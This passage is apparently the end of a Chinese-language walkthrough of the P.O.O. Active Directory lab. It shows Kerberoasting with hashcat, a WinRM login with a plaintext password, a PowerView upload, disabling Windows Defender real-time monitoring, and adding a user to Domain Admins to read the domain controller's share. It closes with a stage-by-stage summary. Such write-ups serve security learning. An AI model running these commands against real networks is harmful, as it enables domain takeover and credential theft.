D99BCAA327E6C1A7B88CB76EE5C6E402F6DC3AEC9947BF31D6795CBE6C042C9BB12E33EC427A94B028A2DB87B9490C72
3F1DEB5E686D3914E811BEA7854307A210130F9D7E590BD05412DFC4CFAB564F977FE534B7E351415F1631230FDA506A
EC76D540094C10235ECC34DA09C3C409F1B94743A15C09AD971D91E490EEC69578C05CFB17DE51EA5D4514C4AF713F69
5727C3B73024E7950A70D360D6A65020C0D27418A2CEDDAFA6CF266251B301CDA4762B3B4A4549F22B49F6173FF9305D
53E0A6B9C150CC0A254F4142AAB6FCD8EEBD145C2656CBA21FD95F666AB79CD78261D79D7BCD30E7EAEDD4CF0312A7C5
405B6CA0196142D23D3145D7742996AF23B6F8A8E05EBEF9021B161ABA86A3BCCE649FF4CE9170DAA57DF349B45AED1B
5F3092B636CB840162647118BA01D8408684E0AC468C6342205D52C920CA7A1AFBBF57E19FAADCB891A69E6B32E36940
333F1BD65BA3475AAFC5837219076E06301A2082C41ED300BF267D94D8CC4B7A7AFAC548336C73D763FC5FE28B46D64B
9FE4D1918B790C9101D9EBC90B5A096FEAEA182A01DEC30C390879CDAF60B4157D5D618611805E7E87D19902A99C4BE5
F3005190D44A115F5EEBF2FD29A999C79FFC9CF0AECD5073B9F5300CA8F0397CCFE9A489C012711DB89316EA65879C1E
FB644F84EE8D0267556936F4A2C3E907B7FB36D6D77B91404D74E225CA96E40F6DE3DF51C5750AD70AB84F443B7
SamAccountName : p00_adm
DistinguishedName : CN=p00_adm,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : cyber_audit/intranet.poo:443
hashcat#
得到 SPN 后用 hashcat 爆破即可,如果不指定输出是不会显示出来的。
hashcat -m 13100 hash.txt /usr/share/seclists/Passwords/Keyboard-Combinations.txt --force #
密码是 ZQ!5t4r
上传 PS 脚本#
刚开始遗漏了一个 IPV6 地址,利用 WINRM 可连接横向。
evil-winrm -i compatibility -u administrator -p 'EverybodyWantsToWorkAtP.O.O.'
*Evil-WinRM* PS C:\programdata> upload /opt/PowerSploit/Recon/PowerView.ps1
Info: Uploading /opt/PowerSploit/Recon/PowerView.ps1 to C:\programdata\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
上传成功
Import-Module .\PowerView.ps1 载入Powershell脚本
被拦截的话需要关闭 WD 防火墙。
*Evil-WinRM* PS C:\programdata> Set-MpPreference -DisableRealtimeMonitoring $true
添加到域管理员组#
现在我将创建一个PSCredential对象,然后将 p00_adm 添加到 Domain Admins:
*Evil-WinRM* PS C:\programdata> $pass = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> $cred = New-Object System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass)
*Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $cred
参考此篇文章:https://adamtheautomator.com/powershell-get-credential
PWN#
由于 p00_adm 现在是域管理员,它可以访问c$DC 上的共享:
*Evil-WinRM* PS C:\programdata> net use \\DC.intranet.poo\c$ /u:intranet.poo\p00_adm 'ZQ!5t4r'
The command completed successfully.
*Evil-WinRM* PS C:\programdata> dir \\DC.intranet.poo\c$\users\
Directory: \\DC.intranet.poo\c$\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/15/2018 1:20 AM Administrator
d----- 3/15/2018 12:38 AM mr3ks
d-r--- 11/21/2016 3:24 AM Public
*Evil-WinRM* PS C:\programdata> type \\DC.intranet.poo\c$\users\mr3ks\desktop\flag.txt
POO{1196ef8b************************}
END.
小结#
到此 P.O.O 终于完成了,借助了很多 wp 的帮助,也认识和学习了很多之前不知道的东西。
Recon 部分是目录枚举,利用了 IIS 短名称漏洞。
Huh?! 部分是 SQL Server 提权,利用了 Linked Database 的错误配置导致的权限提升。
BackTrack 部分是 IIS 服务器的敏感文件读取 C:\inetpub\wwwroot\web.config,利用 SQL Server 使用外部扩展脚本引擎时将会使我们变成另外一个用户执行,从而获得了读取 web.config 的权限。
Foothold 部分则是有些服务不仅仅是在 ipv4 地址,可能是在 ipv6 上,不仅仅存在 TCP 和 UDP 传输协议上的区别,有时也需要检查一下 ipv6 上的服务。
p00ned 部分是域提权,通过拿到 Kerberos 的票据获取密码,然后将用户提升至域管理员权限,即可访问域控制器。